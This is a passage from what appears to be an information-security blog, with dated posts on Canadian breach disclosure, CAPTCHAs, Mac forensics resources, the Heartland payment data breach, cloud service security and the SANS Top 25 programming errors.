Although my comparison of the risks related to use of unsafe automobiles to the risks of using unsafe online services may not be comparable in terms of scale (the risk to life is obviously more important than the risks of information compromise) but I also believe that the alignment of interests including government regulation, if properly designed and implemented, could offer Canadian's a distinct advantage in terms of reputation in the online world.

I would also argue that without these protections afforded average Canadians will continue to be impacted as our use of online services grow.

But there are also significant challenges in educating both the policy-makers and the public on the risks to insecure online services - how many unreported breaches and abuses of information should be tolerated before we act in this way? Is there a common language that can be developed to ensure that the scope and mandate are clear?

I welcome comments and questions from others on this topic.

Completely Automated Brief History - Completely Automated Public Turing Test to Tell Computers and Humans Apart

Computer World has published an interesting and informative article regarding the Completely Automated Public Turing Test to Tell Computers and Humans Apart, or CAPTCHA as they are affectionately known.

While they discuss the value of bot-busting techniques, they also note one of my favorite stories about the spammers using human-based cracking, and my personal favorite of all of these for its effectiveness - getting people to do the heavy lifting for free!

Thursday, January 22

OS X Forensics Resources

With the recent and growing rise of Apple's market share and Microsoft's graceful decline forensic investigations will increasingly encounter Macs as part of the case. But does your existing toolset and methodologies take HFS+ unique characteristics into consideration? What about filevault and timemachine related structures.

Check out the Mac OSX Forensics site as a good place to start with the learning.

ISACA Publication - Defining Information Security Manager Position Requirements

For those Security Manager's that have subscriptions to the ISACA publications, their are a couple of interesting articles/publications that have been released. The first one - Defining Information Security Manager Position Requirements - provides a good description of the information security management role within organizations and what it takes and will take to succeed.

the JOnline publication also has included an article written by Kim Fath and John Ott that provides a basic description of the risks associated with application vulnerabilities. Although not a very original article it provides a good basic description of the issues.

Wednesday, January 21

Responsibility for Public Information Security Training

There have been a number of articles posted recently which point out statistics related to corporate responsibility for security practices, data breach disclosure laws which make it a requirement for customers to be notified of such breaches, etc.

Are Canadian Breach Disclosure laws adequate?
Canadian legislation not coming?

In my observation, there may be a greater risk to our online society from general data abuses and breaches to ordinary citizens, many of these risks appear to stem from our behavior and online habits as a whole. Although many of us educated in the methods used to exploit sensitive information can protect ourselves through;
  • checking website SSL certs,
  • or knowing (spam) what a phishing email looks like,
  • or running a few Google queries to check into the past of a person we're going to transact with
I would argue that the large (and growing) majority of Internet users are not even this savy. Do we really think that this population of users will learn these skills through osmosis? and that after many, many people are taken advantage of, this type of knowledge will become common place? I also take the position that even as security of our sensitive information becomes more prevelent, that the damage done to the overall reputation of the online world will have a much greater negative impact.

All doom and gloom? - not really there are a few organizations which are helping to educate people more quickly; - Government of Canada's Public Safety
Stay Safe Online - US Non-profit
Wiredsafety - Global volunteer organization

One of the questions that comes to mind is - is the amount of public/government attention to this problem adequate? I'll look at this issue in a bit more detail in part - 2 of this post.

Tuesday, January 20

3rd Largest Data Breach Reported

Another wonderful example of how "massive" data breaches can occur. It will be interesting to see how the fallout from this incident differ from the TJX event.

From Washington Post:

Heartland called U.S. Secret Service and hired two breach forensics teams to investigate. But Baldwin said it wasn’t until last week that investigators uncovered the source of the breach: A piece of malicious software planted on the company’s payment processing network that recorded payment card data as it was being sent for processing to Heartland by thousands of the company’s retail clients.

Baldwin said Heartland does not know how long the malicious software was in place, or how many accounts may have been compromised. The stolen data includes names, credit and debit card numbers and expiration dates.

“The transactional data crossing our platform, in terms of magnitude… is about 100 million transactions a month,” Baldwin said. “At this point, though, we don’t know the magnitude of what was grabbed.”

Wednesday, January 14

Security Strengths of Cloud Services

As the debate rages on the direction of 'cloud' computing - which is really just 2.0 word for "software-as-a-service' or SaaS - there are in my opinion a few security benefits which make cloud based services a more secure option for some.

1.  Common platform.  Using a single service platform has the advantage that if a vulnerability exists in the service, it only takes one remedial fix.  This is unlike unique implementations of similar products in each customer, where vulnerabilities can go unnoticed, unpatched, and exploited for long periods of time.  

This glass can also be half-empty though and a single problem or weakness can affect of the service customers.  But if my own experiences with using common platform products (like my macbook) are any indication, I would rather have a problem that all of the product's customers have and that will attract the required attention from the vendor at risk of losing them.

2.  Service agreements.  Mature formal service agreements which are designed to effectively control the services being provided and outline the expectations of both provider and customer are likely to be designed to be fair and open.  This results in communities of customers being able to influence the providers terms.  This includes provisions for security, availability, audit-ability, etc.

3.  Focus on Information.  Many of cloud computing's opposition will argue that if there can be no inherit trust in a 3rd-party system then how can there be any security afforded to the information itself.  I see this as quiet the opposite - if trust cannot be clearly defined, then a conscious decision to keep sensitive data off the service can be made.  This contrasts the current internal service model, where an organization's staff falsely promote the trust of insecure systems, and this results in data at risk without any knowledge of these risks.

4.  Extensions.  As FireGPG is evidence of, many innovator's are equipping cloud service users with tools to do so securely - or to build a layer of trust on top of these services.  This builds on the previous point in which the cloud can be explicitly defined as untrusted, and used for only what it can provide to the secure or trusted layer like transport and storage in the case of secured email.

5.  Buy the availability that you need.  Most services including the invaritable google apps platform provide easy to understand availability service levels.  GAPPS STATS.  While the previous strengths mostly focus on ensuring the confidentiality and integrity of information being manipulated, most cloud services are designed to be purchased depending on the amount of availability required.

The one reality is that the ever-connected nature of cloud services require a supporting level of connection to that particular portion of the Internet, as everyone knows from time-to-time there are interruptions to these connections which no one can control - we are still using the same network that has evolved from simple connections between defense entities and educational institutions.

I would be very interested in what other people's perceptions of the security/insecurity debate of cloud computing.  Here are a few examples a quick cloud search provides:

Monday, January 12

SANS Top 25 Programming Errors

Looks like appsec product vendors now have another angle to sell their gear as SANS has announced the release of their top 25 programming errors.

This is a fantastic list of issues that don't get enough airplay, and instead of focusing on the symptoms of the mistakes (aka OWASP top 10 web-app vulns) this list provides a sample of the root cause issues, although it could be argued that all of these common problems stem from a lack of security policy definition and enforcement regarding development.

At least for those organizations that like to use these types of lists as a form of policy tool, it will significantly reduce the number of issues that arise from development.

Tuesday, January 6

Forensics Links

Sorry about the gap in posts - its been an excellent holiday season and therefor not much time to read or write. Here is a couple of links to some excellent forensics papers which are almost required reading for security professionals these days.
  • An excellent reference for forensics work related to virtual machines has also been published by Brett Shavers here. A must-read for anyone doing forensic work related to VMs.
  • Finally, here is a link to a list of papers related to digital forensics along with a great forum for investigators to discuss related topics. - Forensic Focus
I know that it is easy for security professionals not working daily with forensics to miss out on some of the excellent material out there - I hope this helps catch people up.